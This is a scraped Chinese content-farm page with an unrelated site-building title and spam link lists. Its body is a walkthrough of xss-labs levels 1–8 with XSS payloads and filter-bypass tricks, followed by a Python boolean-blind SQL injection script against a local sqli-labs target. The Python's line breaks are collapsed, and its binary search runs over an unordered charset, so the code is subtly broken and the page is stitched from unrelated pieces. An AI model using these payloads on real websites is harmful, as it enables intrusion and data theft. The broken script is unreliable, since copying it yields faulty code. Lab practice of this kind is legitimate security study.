当前位置: 首页 > news >正文

商丘住房和城乡建设厅网站代做网站修改维护

商丘住房和城乡建设厅网站,代做网站修改维护,青浦网站建设推广,学生自做网站优秀作品xss-labs 1到8关第一关我们发现&#xff0c;当我们更改name等于不同的值时&#xff0c;有不同的返回结果&#xff0c;因此在这里可能有xss漏洞然后直接进行测试&#xff0c;在name后面加入xss攻击语句​<script>alert(1)</script>第二关观察到input标签里面的value…

xss-labs 1到8关

第一关

我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞

然后直接进行测试,在name后面加入xss攻击语句

​<script>alert(1)</script>

第二关

观察到input标签里面的value元素可以尝试突破,逃出引号后,可以使用事件来闭合后面的引号,这里距离onclick事件,当点击输入框后,执行这个弹窗

"><script>alert(1)</script

第三关

1' onclick='alert(1)

第四关

用"闭合后插入

1" onclick="alert(1)

第五关

查看源码发现把<script>转换成了<scr_ipt>,把on转成了o_n,这俩不能用了,换个标签

1'"> <a href="javascript:alert(1)">"'test</a>

第六关

直接使用大小写绕过

1'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

第七关

1'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

 双写了href和script

第八关

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

直接编码javascript:alert(1)为html实体编码

python实现自动化布尔自注的代码进行优化(二分查找)

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度
def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 使用二分查找推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

http://www.dtcms.com/a/444612.html

相关文章:

  • 用什么做网站方便长春网络推广公司小技巧
  • 鼓楼网站开发精准资料网
  • 做一个公司网站要多少钱山东省商务厅网站开发区管理处
  • psd数据网站网站建设维护要加班吗
  • 如何查网站注册信息中国4a广告公司100强
  • 网站备案应该怎么做南阳网站排名优化报价
  • 史上最全设计网站今天最新军事新闻视频
  • 南通专业网站建设模板做网站
  • 太原市住房和城乡建设部网站论坛型网站怎么做的
  • 国外做任务网站免费申请论坛网站
  • 比较好的海报设计网站免费建立个人网站的哪些平台好
  • 网站做编辑器设计方案怎么写格式
  • 如何建立简单网站推广方式都有哪些
  • 长春 网站建设小厂建网站
  • 动画视频模板网站网上创建公司
  • 城乡与建设部网站做网站营销公司排名
  • 淄博张店外贸建站公司什么网站可以接单做设计
  • 建设小说网站首页wordpress文章表单
  • 做网站的详细教程汕头网站推广教程
  • 张家港手机网站制作站长申论
  • 做商城网站用什么框架数据分析网站开发
  • aspcms是网站什么漏洞网页设计实训报告结论
  • 网站的弹窗是怎么做的网页视频怎么下载到电脑上
  • 阿里云网站建设方案书填写dw网页制作怎么插mp4视频
  • 浦东网站建设箱海运做神马网站优化快速排
  • 网络营销推广方法包括有哪些?seo交流论坛seo顾问
  • 什么是销售型网站网页设计制作代码大全
  • 第三次网站建设的通报wordpress使用教程书
  • 申请网站做自己的产品有没有免费的直播视频下载
  • 平顶山股票配资网站建设手机网页制作